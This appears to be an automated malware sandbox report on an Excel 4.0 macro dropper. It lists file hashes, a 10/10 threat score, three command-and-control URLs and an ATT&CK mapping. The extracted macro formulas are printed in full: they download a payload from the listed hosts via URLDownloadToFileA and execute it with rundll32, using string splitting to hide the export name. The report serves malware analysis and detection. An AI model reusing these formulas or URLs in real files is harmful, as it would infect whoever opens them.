General

  • Target

    ?i=1aexjgdkm

  • Size

    83KB

  • Sample

    220522-f55mkafha4

  • MD5

    bdeba7feb925b8151d7f8df5271d7dbc

  • SHA1

    4524ac7e23b673eb9ba92b304d20daf3b8453e51

  • SHA256

    fc47084706c46ae94ca1c083194cef43af916b75afb8afef6f9fa59105067001

  • SHA512

    80cdf16061091e9ce3760931239647a17fdd3483aa9276f1bb8e05399f308b4116e7e665100fd9c7fafacb1be87fb4dfb87b5576930dec29cca9208100750631

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://mail.emilyanncain.com/cgi-bin/A7NT3ENvn/

https://wordpress.baishuweb.com/wp-includes/10q0ice6/

http://monorailegypt.com/wp-admin/6uBf9CCfZRMh/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://mail.emilyanncain.com/cgi-bin/A7NT3ENvn/","..\erum.ocx",0,0)
    =IF('EWDFFEFAD'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://wordpress.baishuweb.com/wp-includes/10q0ice6/","..\erum.ocx",0,0))
    =IF('EWDFFEFAD'!E20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://monorailegypt.com/wp-admin/6uBf9CCfZRMh/","..\erum.ocx",0,0))
    =IF('EWDFFEFAD'!E22<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\rundll32.exe ..\erum.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r")
    =RETURN()

Extracted

  • Language

    xlm4.0

  • Source

    xlm40.dropper

  • URLs

    http://mail.emilyanncain.com/cgi-bin/A7NT3ENvn/

Targets

    • Target

      ?i=1aexjgdkm

    • Size

      83KB

    • MD5

      bdeba7feb925b8151d7f8df5271d7dbc

    • SHA1

      4524ac7e23b673eb9ba92b304d20daf3b8453e51

    • SHA256

      fc47084706c46ae94ca1c083194cef43af916b75afb8afef6f9fa59105067001

    • SHA512

      80cdf16061091e9ce3760931239647a17fdd3483aa9276f1bb8e05399f308b4116e7e665100fd9c7fafacb1be87fb4dfb87b5576930dec29cca9208100750631

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion

    Modify Registry (T1112): 1

  • Discovery

    Query Registry (T1012): 2

    System Information Discovery (T1082): 2
